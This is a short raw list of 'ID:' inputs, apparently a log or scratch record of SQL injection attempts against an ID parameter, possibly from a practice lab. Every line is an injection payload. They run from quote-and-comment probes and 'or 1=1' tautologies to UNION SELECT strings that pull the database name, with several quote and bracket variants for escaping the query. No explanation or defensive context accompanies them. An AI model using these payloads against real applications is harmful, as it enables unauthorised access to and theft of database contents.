ID:1
ID:1
ID:1'
ID:1'
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'
ID:1-- 
ID: or 1=1
ID:1 or 1
ID:1 or 1=1
ID:1 or 1=1
ID:1 or 1=1--
ID:1 or 1=1--
ID:1 or 1=1--
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1" union select 1,database(),3 -- 
ID:-1" union select 1,database(),3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1') union select 1,database(),3 -- 
ID:-1") union select 1,database(),3 -- 
ID:-1'") union select 1,database(),3 -- 
ID:-1'') union select 1,database(),3 -- 
ID:-1") union select 1,database(),3 -- 
ID:-1  union select 1,database(),3 -- 
